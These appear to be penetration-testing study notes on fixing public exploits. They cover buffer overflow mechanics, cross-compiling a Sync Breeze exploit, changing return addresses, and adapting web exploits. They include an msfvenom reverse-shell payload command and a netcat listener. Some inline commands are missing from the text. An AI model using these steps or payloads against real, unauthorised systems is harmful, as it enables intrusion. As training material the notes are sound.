Fixing Exploits
Fixing Memory Corruption Exploits
Overview and Considerations
Normal Flow of a Buffer Overflow
- Create a large buffer to trigger the overflow.
- Take control of EIP by overwriting a return address on the stack by padding the large buffer with an appropriate offset.
- Include a chosen payload in the buffer prepended by an optional NOP sled.
- Choose a correct return address instruction such as JMP ESP (or different register) in order to redirect the execution flow into our payload.
Adapting the existing code (things like file paths, IP addresses and ports, URLs, etc.) but also the payload to talk back to YOUR listener, not to a random IP
Sometime changing they payload is not possible as they are the key to the exploit itself
Make sure to also adapt the offset, because the length of your custom parameters will probably be different
Test your new code within a Lab environment before you try it on the target
- Here you have the chance to attach a debugger
Importing and Examining the Exploit
- Sometimes the same exploit is available in multiple languages
- Scripting Languages (e.g.: Python)
- Requires an interpreter to be executed
- This can be limiting in an environment where we can install a interpreter or need to keep a low profile
- Requires an interpreter to be executed
- Compiled Languages (e.g.: C)
- Concatenating strings is not allowed like in python (
str = str1 + str2
- Concatenating strings is not allowed like in python (
- Scripting Languages (e.g.: Python)
- Flow
- Copy to home dir:
searchsploit -m 42341
- Inspect:
leafpad 42341.c
- Check the header (like the include or import) if the code was meant to be compiled/run from windows or linux
- If its meant for Windows, we can cross-compile it on linux
- Copy to home dir:
Cross-Compiling Exploit Code
- Install:
sudo apt install mingw-w64
- Compile:
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe
If there are errors, google for them
You might need to install dependencies (in this case append
to the previous command)
Changing the Socket Information
- check the code for hardcoded IP and port variables
Changing the Return Address
- Create the target environment locally with a debugger in a lab to determine the return address
- Use other publicly available exploits which match our target environment to get a return address
- If we already have access to the target, we can copy the loaded dlls (use the debugger to figure out which ones are loaded) to our kali vm and use
to search for return addresses
Changing the Payload
Generate new shellcode:
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe
Test it with our lab target
Don't forget to set up a listener
sudo nc -lvnp 443
If the exploit was cross compiled, execute it with wine like this:
wine syncbreeze_exploit.exe
If it doesn't work check if the offset is wrong (see next heading)
Don't forget to restart the service (Win + R ->
Changing the Overflow Buffer
- This really depends on the exploit code but some things to check are
- in
, strings are terminated with the null character - Some exploits replace the last string of the buffer with a null character so that C recognize it as a valid string, but this can cause 1-off errors
- in
Fixing Web Exploits
Considerations and Overview
- Does it initiate an HTTP or HTTPS connection?
- Does it access a web application specific path or route?
- Does the exploit leverage a pre-authentication vulnerability?
- If not, how does the exploit authenticate to the web application?
- How are the GET or POST requests crafted to trigger and exploit the vulnerability?
- Does it rely on default application settings (such as the web path of the application) that may have been changed after installation?
- Will oddities such as self-signed certificates disrupt the exploit?
Selecting the Vulnerability
Search Exploit-DB for exploits which target the enumerated service
Some exploits require valid credentials, they are then called post-authentication exploits.
Changing Connectivity Information
- Adapt things like to the target:
- base url
- http or https depending on if the target uses SSL
- if the certificate used is invalid ->
- (default credentials to valid credentials)
Troubleshooting the "index out of range" Error
- debug as you normally would
Relevant Note(s): Exploitation Locating Public Exploits